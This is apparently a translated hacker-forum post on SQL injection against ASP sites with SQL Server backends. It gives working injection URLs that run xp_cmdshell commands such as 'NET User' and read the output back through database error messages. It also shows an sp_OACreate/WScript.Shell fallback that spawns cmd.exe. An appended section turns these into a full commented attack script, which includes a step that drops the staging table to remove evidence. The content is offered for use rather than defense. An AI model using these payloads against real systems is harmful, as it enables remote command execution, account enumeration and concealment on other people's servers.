Author: Alpha, from: http://www.cnwill.com/

1. Showing the echo of cmd execution. When the injection point runs with sa privileges, not being able to see the echo of the command you run is a very painful thing. Xiaozhu's NBSI also tries to bring the output back, but why not try it yourself? Hehe, let me describe a method that always shows the echo; I don't know what method Xiaozhu uses. First build a table:

http://www.xxxxx.com/down/list.asp?id=1;CREATE TABLE DIRS (Paths Varchar(1000));--

Returns: the normal page. That means the table was created successfully. Carry on with:

http://www.xxxxx.com/down/list.asp?id=1;INSERT DIRS EXEC MASTER.DBO.XP_CMDSHELL 'NET User';--

Returns: the normal page. The command output should now have been written into DIRS, so read it back:

http://www.xxxxx.com/down/list.asp?id=1 and 0<>(Select Top 1 Paths from DIRS);--

Returns: Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the varchar value '***' to a column of data type int.

^_^ The first row of the command output is quoted right there in the error message. Of course, using NBSI to dump the contents of the table directly is faster. Other extended stored procedures can be used the same way to capture their output, for example xp_regread (not tested).

2. The xp_dirtree write-path problem. NBSI's directory listing tool is not very reliable: sometimes nothing is displayed even though the listing actually succeeded, and then you can read the data straight from the table it writes to (default name nb_treelist_tmp).

3. Vulnerability detection by the tool is not ideal. Points like numeric and string type parameters are not reliably detected, and the string type additionally needs the quotes dealt with, so I recommend checking them yourself so that nothing is missed. :P

4.
The problem of xpsql70.dll and xp_cmdshell having been deleted and not being able to upload. Actually CZY covered this very early on; I remember lzy also seemed to mention one, but this one seems different:

Declare @s int
exec sp_oacreate "wscript.shell", @s out
exec sp_oamethod @s, "run", null, "cmd.exe /c echo aaa > c:\a.txt"

That is run in the Query Analyzer; put straight into the address bar it should also run, like this:

declare @s int; exec sp_oacreate "wscript.shell", @s out; exec sp_oamethod @s, "run", null, "cmd.exe /c echo aaa > c:\a.txt"

Not specifically tested at an injection point.
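The two techniques above (the table-based echo from section 1 and the sp_OACreate fallback from section 4) as one T-SQL script, written the way the statements would be typed into Query Analyzer. This is an added example and not code from Alpha's post: the URL, the table and column names DIRS/Paths, the NET USER command and the c:\a.txt path are taken from the post; the IDENTITY column n, the row-by-row extraction and the sp_OADestroy cleanup are my additions that go beyond what the post shows. It assumes an SQL Server 7/2000 backend reached through a numeric "id" parameter concatenated into the application's query, with the connection running as sa or another sysadmin.

```sql
-- Added example, not from the original post. Assumes an MSSQL 7/2000 backend,
-- a numeric "id" parameter concatenated into the application's query, and a
-- connection with sysadmin rights. DIRS/Paths, NET USER and c:\a.txt follow the
-- post; the IDENTITY column "n" and the row-by-row walk are additions.

-- Step 1: stage a table for the command output. Each statement below is what
-- follows "id=1;" in the URL; the trailing "--" comments out the remainder of
-- the application's own query. (URL-encode spaces as %20 and avoid "+" in the
-- payload, since the ASP page decodes "+" to a space.)
CREATE TABLE DIRS (n INT IDENTITY(1,1), Paths VARCHAR(1000));
--

-- Step 2: run the command and capture every line of its output.
-- xp_cmdshell returns one nvarchar(255) column ("output"), one row per line,
-- and INSERT ... EXEC stores all of those rows. "INTO" is optional in T-SQL,
-- so "INSERT DIRS EXEC ..." exactly as written in the post is valid.
INSERT DIRS (Paths) EXEC master.dbo.xp_cmdshell 'net user';
--

-- Step 3: read the result through the application's error page. Here
-- "SELECT 1 WHERE" stands in for the application's "WHERE id=1 AND". The
-- comparison with the INT literal 0 forces the VARCHAR to be converted to INT;
-- a non-numeric value raises error 245 (OLE DB 80040e07), and the message
-- quotes the offending value, which the ASP page echoes back to the browser.
-- Caveat: a NULL row, an empty line ('' converts to 0) or an all-digit line
-- converts without error and therefore shows nothing.
SELECT 1 WHERE 0 <> (SELECT TOP 1 Paths FROM DIRS);

-- Step 3, generalised: walk the output one row per request using the IDENTITY
-- column. Increase the inner TOP count (1, 2, 3, ...) on each request.
SELECT 1 WHERE 0 <> (SELECT TOP 1 Paths FROM DIRS
                     WHERE n NOT IN (SELECT TOP 1 n FROM DIRS ORDER BY n)
                     ORDER BY n);

-- Step 4: remove the evidence once the output has been read.
DROP TABLE DIRS;
--

-- Fallback (section 4): xp_cmdshell / xpsql70.dll removed and no way to upload
-- a replacement. OLE Automation procedures still spawn a shell. WScript.Shell.Run
-- returns an int, hence NULL for the return-value argument. Redirect the output
-- to a file and fetch it by another route, since nothing comes back inline.
DECLARE @s INT;
EXEC sp_OACreate 'WScript.Shell', @s OUT;
EXEC sp_OAMethod @s, 'Run', NULL, 'cmd.exe /c net user > c:\a.txt';
EXEC sp_OADestroy @s;
```

Single quotes are used for the string arguments instead of the double quotes in the post: double quotes are only accepted as string delimiters when QUOTED_IDENTIFIER is OFF for the session, which is the case in Query Analyzer but not guaranteed for the ADO/OLE DB connection an ASP page uses. On SQL Server 2005 and later both xp_cmdshell and the OLE Automation procedures are disabled by default and have to be re-enabled with sp_configure before either half of this script does anything.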